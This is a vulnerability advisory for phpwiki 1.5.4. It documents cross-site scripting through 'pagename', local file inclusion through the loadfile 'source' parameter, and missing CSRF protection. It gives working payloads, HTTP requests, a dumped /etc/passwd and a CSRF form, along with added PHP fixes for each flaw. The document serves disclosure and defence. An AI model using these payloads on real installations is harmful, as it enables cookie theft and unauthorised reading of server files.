# Title: phpwiki 1.5.4 - Cross Site Scripting / Local File Inclusion
# Date: 29.08.15
# Vendor: sourceforge.net/projects/phpwiki/
# Affected versions: => 1.5.4 (current)
# Tested on: Apache2.2 / PHP5 / Deb32
# Author: Smash_
# Contact: smash [at] devilteam.pl

1/ Cross Site Scripting

A cross-site scripting vulnerability in user preferences allows remote, unauthenticated users to inject arbitrary web script via the GET or POST 'pagename' parameter.

Example url:

http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--

Example request:

POST /phpwiki/index.php/UserPreferences HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: folder_p-tbx=Open; PHPSESSID=3ko4uprjgmnjtmfkes3dnh0gk4; PhpWiki_WIKI_ID=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260

pref%5Bemail%5D=&pref%5BnotifyPages%5D=&pref%5Btheme%5D=&pref%5Blang%5D=&pref%5BeditHeight%5D=22&pref%5BeditWidth%5D=80&pref%5BtimeOffset%5D=0&pagename=UserPreferencesabc%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--&action=browse

Example response:

HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 21:30:47 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Vary: Accept-Encoding
Content-Length: 16114
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

(...)
<script type="text/javascript">
<!--//
var rateit_imgsrc = '/phpwiki/themes/wikilens/images/RateIt';
var rateit_action = 'RateIt';
// --></script>
<script type="text/javascript">
<!--//
var data_path = '/phpwiki';
var pagename = 'UserPreferencesabc</script><script>alert(document.cookie)</script><!--';
var script_url= '/phpwiki/index.php';
var stylepath = data_path+'/themes/Sidebar/';
var folderArrowPath = '/phpwiki/themes/default/images';
var use_path_info = true;
// --></script>
</head>
(...)
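The response above shows the injected value landing inside a single-quoted JavaScript string literal. The PHP below is an added example, not PhpWiki's code: it contrasts that emission pattern with one that serialises the value through json_encode() with the JSON_HEX_* flags, and adds a small check that counts closing script tags in the output. The function names (emit_pagename_unsafe, emit_pagename_safe, closes_script_early) are hypothetical.

```php
<?php
// Added example (not PhpWiki's own code): why a 'pagename' value breaks out of
// an inline <script> block, and how to emit it safely.  Function names are
// hypothetical; the payload string is the one shown in the advisory.

declare(strict_types=1);

// Vulnerable pattern: the value is placed inside a JS string literal.  The HTML
// tokenizer ends the script element at the first "</script" it meets, before
// the JS parser ever sees the quotes, so quoting alone cannot contain it.
function emit_pagename_unsafe(string $pagename): string
{
    return "<script type=\"text/javascript\">\nvar pagename = '"
        . $pagename . "';\n</script>";
}

// Hardened pattern: serialise the value as a JSON string literal and hex-escape
// every character that matters to the HTML parser or to JS quoting.  With
// JSON_HEX_TAG, '<' and '>' become \u003C and \u003E, so "</script" can no
// longer occur in the output; the JS engine decodes the escapes back to the
// original characters at runtime.
function emit_pagename_safe(string $pagename): string
{
    $flags   = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $literal = json_encode($pagename, $flags);
    if ($literal === false) {
        // Invalid UTF-8 or another encoding failure: refuse rather than emit junk.
        throw new RuntimeException('pagename is not valid UTF-8');
    }
    return "<script type=\"text/javascript\">\nvar pagename = "
        . $literal . ";\n</script>";
}

// Cheap review/unit-test check for any inline-script emitter: a correctly
// built block contains exactly one "</script" (its own closing tag).
function closes_script_early(string $html): bool
{
    return preg_match_all('#</script#i', $html) > 1;
}

// Payload from the advisory, used only to show the two outputs side by side.
$payload = 'UserPreferencesabc</script><script>alert(document.cookie)</script><!--';

$unsafe = emit_pagename_unsafe($payload);
$safe   = emit_pagename_safe($payload);

echo 'unsafe closes the script element early: ',
    closes_script_early($unsafe) ? 'yes' : 'no', "\n";
echo 'safe closes the script element early:   ',
    closes_script_early($safe) ? 'yes' : 'no', "\n";
echo $safe, "\n";
// The safe variant prints the value as
// "UserPreferencesabc\u003C\/script\u003E\u003Cscript\u003Ealert(document.cookie)\u003C\/script\u003E\u003C!--"
```

JSON_HEX_TAG is the flag that matters for this finding; JSON_HEX_AMP, JSON_HEX_APOS and JSON_HEX_QUOT close the equivalent breakouts for values that end up in attributes or single-quoted contexts. The same approach applies to every variable the template writes into the inline script, not only pagename.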

2/ Local File Inclusion

A directory traversal vulnerability in the file load section allows authenticated attackers to read arbitrary files via the POST or GET 'source' parameter. The content of the file is afterwards available in the created page.

Example url:

http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration?action=loadfile&overwrite=1&source=/etc/group

#1 - Example request:

POST /phpwiki/index.php/PhpWikiAdministration HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration
Cookie: folder_p-tbx=Open; folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

action=loadfile&overwrite=&pagename=PhpWikiAdministration&source=/etc/passwd

#1 - Example response:

HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 22:09:36 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3534

(...)
<a id="contentTop"></a>
<h1 class="firstHeading">Loading “/etc/passwd”</h1>
<div id="bodyContent">
<em><a href="passwd" class="wiki">passwd</a></em><span> from “plain file /etc/passwd” content is identical to current version 1 - no new revision created</span><p><strong>Complete.</strong></p>
<p>Return to <a href="PhpWikiAdministration" class="wiki">PhpWikiAdministration</a></p>
(...)

#2 - Example request:

GET /phpwiki/index.php/passwd HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration
Cookie: folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625
Connection: keep-alive

#2 - Example response:

HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 22:10:34 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
ETag: W/"97df6cb9b2668497eb1a804ab9c18eb8"
Last-Modified: Sat, 29 Aug 2015 22:09:55 GMT
Cache-Control: must-revalidate
Expires: Sat, 29 Aug 2015 22:10:14 GMT
Vary: Cookie
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 22599

(...)
<div class="wikitext"><p>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
<a href="news:x:9:9:news:/var/spool/news:/bin/sh" target="_blank" class="namedurl"><span style="white-space: nowrap"><img src="/phpwiki/themes/Sidebar/images/url.png" alt="" class="linkicon" />news:x:9:9:news:/var/spool/news:/bin/sh</span></a>
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server<sub>,:/nonexistent:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
colord:x:103:107:colord colour management daemon</sub>,:/var/lib/colord:/bin/false
usbmux:x:104:46:usbmux daemon<sub>,:/home/usbmux:/bin/false
miredo:x:105:65534::/var/run/miredo:/bin/false
ntp:x:106:113::/home/ntp:/bin/false
Debian-exim:x:107:114::/var/spool/exim4:/bin/false
arpwatch:x:108:117:ARP Watcher</sub>,:/var/lib/arpwatch:/bin/sh
avahi:x:109:118:Avahi mDNS daemon<sub>,:/var/run/avahi-daemon:/bin/false
beef-xss:x:110:119::/var/lib/beef-xss:/bin/false
dradis:x:111:121::/var/lib/dradis:/bin/false
pulse:x:112:122:<span style="text-decoration: underline" class="wikiunknown"><span>PulseAudio</span><a href="PulseAudio?action=create" title="Create: PulseAudio" onmouseover="window.status="Create: PulseAudio"; return true;" onmouseout="window.status='';return true;" rel="nofollow">?</a></span> daemon</sub>,:/var/run/pulse:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher<sub>,:/var/run/speech-dispatcher:/bin/sh
haldaemon:x:114:124:Hardware abstraction layer</sub>,:/var/run/hald:/bin/false
iodine:x:115:65534::/var/run/iodine:/bin/false
postgres:x:116:127:PostgreSQL administrator<sub>,:/var/lib/postgresql:/bin/bash
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
redsocks:x:118:128::/var/run/redsocks:/bin/false
snmp:x:119:129::/var/lib/snmp:/bin/false
stunnel4:x:120:130::/var/run/stunnel4:/bin/false
statd:x:121:65534::/var/lib/nfs:/bin/false
sslh:x:122:133::/nonexistent:/bin/false
Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false
rtkit:x:124:136:<span style="text-decoration: underline" class="wikiunknown"><span>RealtimeKit</span><a href="RealtimeKit?action=create" title="Create: RealtimeKit" onmouseover="window.status="Create: RealtimeKit"; return true;" onmouseout="window.status='';return true;" rel="nofollow">?</a></span></sub>,:/proc:/bin/false
saned:x:125:137::/home/saned:/bin/false
devil:x:1000:1001:devil<sub>,:/home/devil:/bin/bash
debian-tor:x:126:138::/var/lib/tor:/bin/false
privoxy:x:127:65534::/etc/privoxy:/bin/false
redis:x:128:139:redis server</sub>,:/var/lib/redis:/bin/false</p>
</div>
(...)

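The defensive fix for the loadfile action is to never let 'source' name a path outside the one directory the wiki is meant to load files from. The PHP below is an added example, not PhpWiki's code: a realpath()-based containment check exercised against a constructed temporary directory, with the advisory's /etc/passwd value, a ../ traversal and a symlink pointing out of the directory all rejected. resolve_inside() and the directory layout are assumptions; a POSIX filesystem is assumed for the symlink case.

```php
<?php
// Added example (not PhpWiki's own code): confining the 'source' parameter of
// a file-load action to one directory.  Names and layout are hypothetical.

declare(strict_types=1);

/**
 * Resolve $source relative to $baseDir and return the canonical path if, and
 * only if, it stays inside $baseDir.  Returns null otherwise: absolute paths
 * such as /etc/passwd, ../ traversal, symlinks that leave the directory, and
 * files that do not exist.
 */
function resolve_inside(string $baseDir, string $source): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                              // base directory itself missing
    }
    // Never treat the user value as a path root: strip leading separators so
    // "/etc/passwd" is looked up as "<base>/etc/passwd" and then canonicalised.
    $candidate = $base . DIRECTORY_SEPARATOR . ltrim($source, '/\\');
    $real = realpath($candidate);                 // false if it does not exist
    if ($real === false) {
        return null;
    }
    // Compare against the base with a trailing separator so that a sibling
    // directory such as "<base>2" cannot pass as a prefix match.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;                              // escaped the directory
    }
    return $real;
}

// --- self-check on a constructed temporary layout -------------------------
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'loadfile-demo-' . getmypid();
mkdir($tmp . '/uploads', 0700, true);
file_put_contents($tmp . '/uploads/notes.txt', "wiki page source\n");
file_put_contents($tmp . '/secret.txt', "outside the upload dir\n");
symlink($tmp . '/secret.txt', $tmp . '/uploads/link-out');

$cases = [
    'notes.txt'      => true,   // plain file inside the directory: allowed
    '/etc/passwd'    => false,  // absolute path from the advisory: rejected
    '../secret.txt'  => false,  // traversal out of the directory: rejected
    'link-out'       => false,  // symlink leaving the directory: rejected
    'does-not-exist' => false,  // unknown file: rejected
];
foreach ($cases as $source => $expectAllowed) {
    $allowed = resolve_inside($tmp . '/uploads', $source) !== null;
    printf("%-15s %s\n", $source, $allowed === $expectAllowed ? 'ok' : 'MISMATCH');
}

// cleanup of the constructed layout
unlink($tmp . '/uploads/link-out');
unlink($tmp . '/uploads/notes.txt');
unlink($tmp . '/secret.txt');
rmdir($tmp . '/uploads');
rmdir($tmp);
```

The check canonicalises both the base directory and the candidate before comparing, so a base directory reached through a symlink (a common /tmp layout) still compares equal to itself. An allowlist of file extensions on top of this, and running the action only for an explicitly administrative role, narrows what an authenticated user can feed the page creator.
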
3/ Cross Site Request Forgery

Since the application has no CSRF protection, a remote attacker is able to trigger specific actions.

PoC:

<html>
<!-- Change settings / XSS -->
<body>
<form action="http://192.168.0.10/phpwiki/index.php/UserPreferences" method="POST">
<input type="hidden" name="pref[email]" value="" />
<input type="hidden" name="pref[notifyPages]" value="" />
<input type="hidden" name="pref[theme]" value="" />
<input type="hidden" name="pref[lang]" value="" />
<input type="hidden" name="pref[editHeight]" value="22" />
<input type="hidden" name="pref[editWidth]" value="80" />
<input type="hidden" name="pref[timeOffset]" value="0" />
<input type="hidden" name="pagename" value="UserPreferencesabc</script><script>alert(document.cookie)</script><!--" />
<input type="hidden" name="action" value="browse" />
<input type="submit" value="Go" />
</form>
</body>
</html>
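The standard mitigation for the PoC form above is a per-session secret that the legitimate form must echo back and that a page on another origin cannot read. The PHP below is an added example, not PhpWiki's code: token issue, hidden-field rendering and constant-time validation, exercised with a genuine, a forged and a guessed submission. csrf_token(), csrf_field(), csrf_valid() and the plain arrays standing in for $_SESSION and $_POST are assumptions.

```php
<?php
// Added example (not PhpWiki's own code): a per-session CSRF token for
// state-changing forms such as UserPreferences.  Plain arrays stand in for
// $_SESSION and $_POST so the script runs from the CLI; names are hypothetical.

declare(strict_types=1);

// Issue the session's token on first use and reuse it afterwards:
// 32 bytes from the CSPRNG, hex-encoded.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in every POST form; the value is HTML-escaped.
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '" />';
}

// Validate a submitted form: the session must already hold a token and the
// submitted one must match it.  hash_equals() compares in constant time.
function csrf_valid(array $session, array $post): bool
{
    if (empty($session['csrf_token'])
        || !isset($post['csrf_token']) || !is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

// --- walk-through ----------------------------------------------------------
$session = [];                      // the victim's server-side session
$field   = csrf_field($session);    // rendered into the legitimate form

// Legitimate submission: the browser posts back the token the form carried.
$genuine = ['pref' => ['editWidth' => '80'], 'action' => 'browse',
            'csrf_token' => $session['csrf_token']];

// Cross-site submission like the PoC form: the attacker's page cannot read the
// victim's token, so the field is absent, or at best a guess.
$forged  = ['pref' => ['editWidth' => '80'], 'action' => 'browse'];
$guessed = $forged + ['csrf_token' => str_repeat('0', 64)];

printf("genuine: %s\n", csrf_valid($session, $genuine) ? 'accepted' : 'rejected');
printf("forged:  %s\n", csrf_valid($session, $forged)  ? 'accepted' : 'rejected');
printf("guessed: %s\n", csrf_valid($session, $guessed) ? 'accepted' : 'rejected');
```

Only the genuine submission is accepted. A SameSite=Lax or Strict attribute on the session cookie reduces the exposure further, but the token check is the control that does not depend on browser behaviour, and it should cover every action that changes state, not only the preferences form.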